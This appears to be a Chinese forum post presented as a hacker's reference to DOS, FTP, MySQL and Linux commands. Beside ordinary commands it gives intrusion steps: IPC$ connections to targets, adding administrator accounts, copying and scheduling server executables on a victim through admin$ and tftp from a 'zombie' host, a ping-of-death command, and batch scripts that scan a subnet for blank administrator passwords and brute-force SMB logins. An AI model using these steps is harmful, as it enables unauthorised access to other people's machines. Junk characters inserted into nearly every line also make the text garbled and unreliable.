返回列表 发帖

黑客基础--最全的DOS命令

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
9 F6 d8 a6 Z) C& ?3 g! ?net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
5 z3 i' P9 Z4 F( Y6 U% g) T9 mnet use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
% b2 K9 z% I& i  C8 d) ~3 @; M4 C6 pnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C:到本地为H: * @0 f$ o, Z# i/ q; H- \7 X6 o2 O- Y/ Q1 ]
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
6 B; b% z& R2 d5 \net use h: /del 删除映射对方到本地的为H:的映射
" ?; ^& g. @. C5 }7 _2 Unet user 用户名 密码 /add 建立用户
  q/ j+ w* \. I. pnet user guest /active:yes 激活guest用户 ; _" N" k1 j. x7 k
net user 查看有哪些用户 # q' s, x2 _( e% J" g
net user 帐户名 查看帐户的属性 7 d7 A+ \, U+ L, Z" y
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 + h& a1 x3 L* ]4 f& q/ G
net start 查看开启了哪些服务 / l9 n  q4 R3 Q% ^6 g
net start 服务名  开启服务;(如:net start telnet, net start schedule) 4 S3 S4 m) p9 v+ b! [& X
net stop 服务名 停止某服务
& ^5 B2 u3 K% F6 m# vnet time \\目标ip 查看对方时间 / @; b. r7 |9 H
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 ) c6 U& `+ o" {1 w
net view 查看本地局域网内开启了哪些共享 * \" S) S4 P$ N& M8 z
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 8 A2 i: w1 L7 C5 z- ~7 r% \! \
net config 显示系统网络设置 * U; b- ~2 c) L. n2 Y* A/ p
net logoff 断开连接的共享
3 U: E, {- L- m8 ?8 K& n% Pnet pause 服务名 暂停某服务
* I: Y7 l$ H2 j4 Dnet send ip "文本信息" 向对方发信息 7 o- b# x: {2 t/ ]
net ver 局域网内正在使用的网络连接类型和信息 2 U. ]$ X. Q% m% g' m. X* _1 \/ T
net share 查看本地开启的共享 $ j4 t! l" N8 ~5 ?; q
net share ipc$ 开启ipc$共享
3 h- {6 d. W2 j: w$ Enet share ipc$ /del 删除ipc$共享 , O5 r! ^! x5 f9 E1 t# g
net share c$ /del 删除C:共享
- }5 T! Y; c3 Hnet user guest 12345 用guest用户登陆后用将密码改为12345
/ x$ S8 s( `6 x0 ~net password 密码 更改系统登陆密码 5 C/ }, n/ @$ k5 Q5 F
netstat -a 查看开启了哪些端口,常用netstat -an
" V: b& s# Q  @netstat -n 查看端口的网络连接情况,常用netstat -an 2 l, b8 \) I' d; W# }( L" Q
netstat -v 查看正在进行的工作 $ q8 |1 w+ y; }- R# e
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) ' t' @- E9 S+ V$ Q- _' g) @
netstat -s 查看正在使用的所有协议使用情况
# A( }7 f3 Z. G# l( N. B+ vnbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
# P$ I( \9 p' atracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。 ( F0 }- e5 [+ u
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
; n5 h. h6 U4 _) @6 e& _ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
) N! d4 C5 Y* w8 Sipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息 4 R/ c8 P" W# ^7 X  y
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
8 [# Y  t7 i: D, zkill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) . c# w8 v+ q$ D% b4 ~. i- p
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 9 ]3 H7 v: J% V- ^
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) , f& n' r, @' R, V+ y6 s2 H
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 ' j7 \+ s. |- E! F' B1 A- p! K
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
2 Z# z" W2 F; ~* G& m3 K" Iat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务 1 A1 o3 _% Z9 m/ }+ @
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 : P, E  l  P1 W9 s8 H
at id号 /delete 停止某个已注册的计划任务
9 f+ L; @6 `& Eat 查看所有的计划任务
" D7 H$ Q$ j- h: ]5 Oat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 3 ~8 e3 d+ a! Q8 u& ]
finger username @host 查看最近有哪些用户登陆
8 }4 z3 Z, n- P7 u1 v, Itelnet ip 端口 远和登陆服务器,默认端口为23
5 @* x+ y8 u6 `2 y& P- I( Sopen ip 连接到IP(属telnet登陆后的命令)
- l* Z& E& g; j) ]7 i. ?0 @telnet 在本机上直接键入telnet 将进入本机的telnet
$ R: ~9 F0 Z6 M5 ]+ }5 ccopy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
" n0 J: b: G2 e3 V/ G8 z! Hcopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 4 Z- B  ?) n' p
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 & b+ T2 t4 ?+ a- X5 M% f
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: ; g# P4 c7 N$ u5 @8 g7 i
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 * c9 X& ?: L# S% `: ?9 d7 f- v( H
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送 0 k' S# t2 G- ~) K& O
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机 2 d. d7 H- }# ^3 b1 M$ S4 M; a
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时) 4 X% y( h" c9 ^+ N( }# Q
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
/ j/ z4 g' J; `2 D/ zarp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
$ H- U; S0 v$ R: \  nstart 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
" @$ T5 h  k" l  c: Kmem 查看cpu使用情况 - a& Y/ U/ ]3 e! j' u( K3 P4 t) F3 N
attrib 文件名(目录名) 查看某文件(目录)的属性 ' V& O! o, H. e1 B2 T2 O  o3 m
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
9 F, ?4 M# P& q5 D$ q; vdir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
8 C% t# Z5 O$ Mdate /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间 0 e" C4 ]$ P3 w4 A
set 指定环境变量名称=要指派给变量的字符 设置环境变量
5 r, U# r5 V3 }6 Uset 显示当前所有的环境变量
; ]3 W/ c% q8 D0 G# V$ Lset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
& a, ]7 f3 _  {& upause 暂停批处理程序,并显示出:请按任意键继续.... 3 K; q$ j+ Y, ^1 M  f
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
: U& H/ U( Z, u, u4 Zgoto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签) 0 I( d. w/ c1 S
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?) # Q! W. n2 W' i0 F: c2 q+ j  r
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
$ i2 K- x. n* o4 B# Zecho on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 + |7 O( c  Q1 i: o! A! [
echo 信息 在屏幕上显示出信息
) f3 |! L% @5 O& f, u- Eecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中
) ^* A. L6 C3 J" v+ gfindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello 9 C! l" D( A+ Q7 Z) Y0 @9 f
find 文件名 查找某文件 , |  Y# C5 `7 w1 N" Q( c) H
title 标题名字 更改CMD窗口标题名字
: y  G( `) w, u7 I$ C" |5 }color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 0 I% x* [' [/ l4 d. B9 a/ I0 z5 @
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ ) 6 K& f( o' b* @; N4 E. V1 O
print 文件名 打印文本文件
6 K1 v7 c' P+ _4 Q& O% |  N3 w: xver 在DOS窗口下显示版本信息
7 q' `2 Z* V0 i5 j8 l8 {$ K8 gwinver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
  N/ T- N# A8 \9 s; h( l; v3 ]) Yformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS & b3 d. D" s3 Y
md 目录名 创建目录 4 M/ D5 h, i6 V; q
replace 源文件 要替换文件的目录 替换文件
8 Z. I1 Z$ ]! |ren 原文件名 新文件名 重命名文件名 2 z, S- i% L  t( z1 r" F
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称 , ^8 X* j9 _- f2 T2 l5 u& T
type 文件名 显示文本文件的内容 1 O) Y9 E" o0 |; Z
more 文件名 逐屏显示输出文件
7 k( H6 i2 ~: ~2 m; ~- k) }! n0 `doskey 要锁定的命令=字符
1 h) p5 N4 [/ |( Odoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir= ; d5 A( n; F0 p6 A. f- m2 N' m  o
taskmgr 调出任务管理器
9 ^1 k( k; M  n# m2 h$ @- e# Dchkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误 ) j! D- e& e: c# N8 E, w# A
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
; z. D8 Z4 ~9 v2 D# hexit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe 3 H4 O: w! b1 I
path 路径\可执行文件的文件名 为可执行文件设置一个路径。 3 _8 P3 ~/ ]( ^
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
2 n) |4 d/ a" i; S2 z- h+ Lregedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;   S) \+ D: Y/ J2 O
regedit /e 注册表文件名 导出注册表 3 @$ ?9 E: Q$ N% \* z/ M  k
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
; i/ a4 }: _' U& ucacls 文件名 查看文件的访问用户权限列表
, M0 @, J' u& w! O0 bREM 文本内容 在批处理文件中添加注解 & s( p6 r% N2 W% |- J+ F; T5 c
netsh 查看或更改本地网络配置情况& }9 W( \! ?- E
IIS服务命令:
$ h6 j2 E5 ]1 x, diisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
/ @3 M3 g; Q! _iisreset /start或stop 启动(停止)所有Internet服务
8 l+ L0 M9 [8 |iisreset /restart 停止然后重新启动所有Internet服务
2 T/ ?1 s, ~+ t. Ziisreset /status 显示所有Internet服务状态 ' |4 N3 b2 R! J0 b0 J0 B  X
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动 6 j8 p* [0 |/ g
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 - k* y& ~' a* [& S
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务 0 Z9 H! y5 v1 d, q# Z
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 / j) Q/ I0 f2 t# i- S3 R2 C! C, L
FTP 命令: (后面有详细说明内容) " F+ T; O1 b/ X: w3 Z+ C- _) @7 p
ftp的命令行格式为:
! p$ w6 i- I4 V, R9 lftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
4 \8 M: y2 ~, U9 B. H0 O4 w-d 使用调试方式。 9 \( p( K# y" z- F( o
-n 限制ftp的自动登录,即不使用.netrc文件。
8 c7 }, |0 r# ~8 O-g 取消全局文件名。
0 P, J6 w# [& L: F- bhelp [命令] 或 ?[命令] 查看命令说明 - ^9 C; B- f: z+ |7 u3 c, H( [
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. 8 t% E, V7 P/ H. q' E# j
pwd 列出当前远端主机目录
* T; A% n9 }2 \  D9 O7 _, {put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 # P5 m1 ]$ z0 F  F
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 # M- ^3 X+ q2 s: F: A
mget [remote-files] 从远端主机接收一批文件至本地主机
+ {" n9 W! y+ P2 Wmput local-files 将本地主机中一批文件传送至远端主机 - M# ]2 y' w9 N" Y, I* T. F/ u( }
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 3 R# l4 ?2 q4 ?0 H
ascii 设定以ASCII方式传送文件(缺省值) & {  l/ k; X& R$ G9 m  |
bin 或 image 设定以二进制方式传送文件 0 S; `4 O4 u  M1 E; a
bell 每完成一次文件传送,报警提示 ' s* p( a' U$ @) a; z' h+ o
cdup 返回上一级目录 ) {* H( Q% W0 w9 q; B" \
close 中断与远程服务器的ftp会话(与open对应) 8 z5 E7 g- U8 U0 h
open host[port] 建立指定ftp服务器连接,可指定连接端口 : b+ Z6 x2 \" N& _' ?! ?, G
delete 删除远端主机中的文件 : e. l8 z+ {! B/ t
mdelete [remote-files] 删除一批文件 3 Q# Z7 b: a! ?# q  V" z
mkdir directory-name 在远端主机中建立目录 ( n0 ^* }; z9 t4 q6 B! q
rename [from] [to] 改变远端主机中的文件名 . A7 b' A5 }5 j% n5 [
rmdir directory-name 删除远端主机中的目录
0 g9 L! j; Y5 r* U- nstatus 显示当前FTP的状态 $ t% \: V) r/ \
system 显示远端主机系统类型 , o' m. P. z0 a7 M
user user-name [password] [account] 重新以别的用户名登录远端主机 ) Z8 x. V7 d3 O6 _1 [
open host [port] 重新建立一个新的连接 0 ]  b( y5 E9 N( ^  m* b
prompt 交互提示模式 3 _/ }% ^8 E3 e2 B3 P+ T
macdef 定义宏命令 0 h" h9 [5 E2 h+ M
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录   Z1 e, M- B4 j7 _0 u+ n) _& }
chmod 改变远端主机的文件权限 9 O- _' @2 T- H7 o1 r. B$ |: `  {
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 & ]9 h/ E( T2 ^3 }  U
cd remote-dir 进入远程主机目录 6 D+ ^; D8 w6 v( p* J+ X! y6 Y
cdup 进入远程主机目录的父目录 4 @  }% g( \  t" l
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
% g: G& U( \+ UMYSQL 命令:
( d4 c' a1 h6 Y& |mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。! F) E- j& ]6 h' x  Z- N7 l: q* r* ~
(例:mysql -h110.110.110.110 -Uroot -P123456 , M; K9 y1 W! V3 V) c- c- I' q
注:u与root可以不用加空格,其它也一样)
+ D* m, i* T% X' C0 M! Vexit 退出MYSQL
1 \7 C/ N! Q- o2 r  imysqladmin -u用户名 -p旧密码 password 新密码 修改密码 + n1 t! {$ D6 U& H
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符) 3 I$ L1 t" Y% ?1 X5 Z
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。 * Z; i" k" B( h. Q% H
use mysql;  m- t# d6 ^4 ?- {+ O
show tables; 显示库中的数据表 8 K' g( h( n- v/ S8 Y
describe 表名; 显示数据表的结构 ' v- o& l- f* d1 Z. R9 L) o
create database 库名; 建库
% i6 R$ W- D1 ^% X: ]$ Luse 库名;- X( f; V4 J' H0 a& t' y
create table 表名 (字段设定列表); 建表 3 ?% ~: X7 F4 B9 c- V
drop database 库名; 0 [, N# B4 c3 G7 G% ~. F
drop table 表名; 删库和删表 # {* b2 J! a/ H/ G
delete from 表名; 将表中记录清空
* a& n0 X  ~7 u4 ]$ r) g# y; Xselect * from 表名; 显示表中的记录 4 p, C$ Z9 q8 |7 t
mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。
! ^% J6 E% w1 qwin2003系统下新增命令(实用部份):
4 y0 o6 R0 M8 ~# ?5 Oshutdown /参数 关闭或重启本地或远程主机。
( D$ n* U. A2 ~# w参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
! a# ^0 W2 w, Z1 x2 M+ v+ L$ o例:shutdown /r /t 0 立即重启本地主机(无延时)
- t+ C* ^  Y3 m: f* h  P4 wtaskill /参数 进程名或进程的pid 终止一个或多个任务和进程。8 Y# c2 a( d! N: y' b
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。 1 V8 i& Z: W. U/ L5 |% _* ]* s
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
! j8 x5 x- W% \% ]1 K参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程0 w! d7 K6 t) \+ W
Linux系统下基本命令: 要区分大小写
/ x; x8 w, Y. J, |uname 显示版本信息(同win2K的 ver)
: w2 E- f0 `7 ?" Q* Xdir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir) 9 K3 J+ A1 i  H- j1 [4 ~; x) {
pwd 查询当前所在的目录位置
1 `0 L. q  |6 ^: W' Gcd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。 1 X6 O; M1 p, t$ o2 ]: r
cat 文件名 查看文件内容
, ]7 S) r/ ?& \cat >abc.txt 往abc.txt文件中写上内容。
7 v: U, s- g) G% b7 S" Ymore 文件名 以一页一页的方式显示一个文本文件。 2 Z8 j* ?: w# C" o. G' e
cp 复制文件 2 v  v3 {1 M8 ~
mv 移动文件
/ q. U/ `1 e8 z0 T4 s: Urm 文件名 删除文件,rm -a 目录名删除目录及子目录
! E4 c- p# v- S3 K1 ^* K& T( Cmkdir 目录名 建立目录 ' s7 Y* |; F2 U" a
rmdir 删除子目录,目录内没有文档。 3 c8 i5 J0 P) ~7 x1 K, M( x
chmod 设定档案或目录的存取权限
# V3 H2 i) z: |" Hgrep 在档案中查找字符串
8 Z: |( A' U& X% {; ]6 F3 m1 qdiff 档案文件比较
3 F% j5 g. r! ?8 W& I5 B2 efind 档案搜寻 0 F" e" n  l  U) Z, S* F& x! J
date 现在的日期、时间
, a6 V1 I: |( j, u4 a* S( Q# [who 查询目前和你使用同一台机器的人以及Login时间地点 + I" n8 c" [% t" h
w 查询目前上机者的详细资料
4 j: N# x, J, v8 b+ O$ i+ T1 @' Q. gwhoami 查看自己的帐号名称
3 ^6 r( _. ?7 H! i% K( xgroups 查看某人的Group
$ Q9 l/ Y7 r, X" S0 `9 [; [passwd 更改密码 6 c) Z& W3 _6 P
history 查看自己下过的命令 3 |* X3 h2 w2 I7 B
ps 显示进程状态 0 u8 v3 _5 O% K/ q, ]
kill 停止某进程 2 P% Y; E4 B) H" [
gcc 黑客通常用它来编译C语言写的文件
* M+ ^0 P' m2 Z5 xsu 权限转换为指定使用者 - s% b; Q, L% q
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
9 \; A& ]: U* Wftp ftp连接上某服务器(同win2K9 S! J* e6 k' X+ Y; v- ~* Z
附:批处理命令与变量
' M: {5 B% C: K9 }9 p5 {: K1:for命令及变量 基本格式:
0 G( [4 W: b7 k. J  s) dFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。1 d* ~2 S4 e: K! K, [; v4 x
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3, ^, W  n, l% i
(set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1}
$ i* h* Q3 j, ecommand:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开
6 a; |; _0 }( j+ v8 {( m3 acommand_parameters:为特定命令指定参数或命令行开关3 R3 ?: V3 n' {$ @
IN (set):指在(set)中取值;DO command :指执行command( U, Y, P' n' ?. y  U
参数:/L 指用增量形式{(set)为增量形式时};/F 指从文件中不断取值,直到取完为止{(set)为文件时,如(d:\pass.txt)时}。
; M2 a$ s0 i, W  ?4 D/ H" {用法举例: % n" d/ D3 `$ ?4 ?9 n: `$ f% v
@echo off
7 n: X: \, w% s; t4 Recho 用法格式:test.bat *.*.* > test.txt $ k5 N1 h  C4 |4 r
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt . }# Z) b4 n9 F( M* K
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。
/ w7 ]! S' X0 e5 b/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。 & \( q' ]& P- B+ Q4 }4 G+ m9 {1 C
@echo off
& z4 S* b! u5 Gecho 用法格式:ok.bat ip ! \( u( X6 Z/ m# }( F6 j
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
5 V; i7 j( T% x8 m( T0 N* l* w存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。) q* M* E/ v* y2 o. y  P
2:if命令及变量 基本格式:   h: v% f8 q' u" [# l
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。! z2 [  Q; f2 S7 k4 E" t* K' f
例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。
: }3 T! v% F1 Y5 t8 T: U& y( k0 指发现并成功执行(真);1 指没有发现、没执行(假)。
& C9 R- Y6 U4 X) lIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。
' I+ {, Q& r# O( `* I$ Z- O/ @4 z- g例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")
2 V% x0 |% n& _; e: H& RIF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。- K. o6 y1 O' c) ~% K" I" z
例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。
6 P) d2 \3 Y( AIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.”

返回列表
【捌玖网络】已经运行: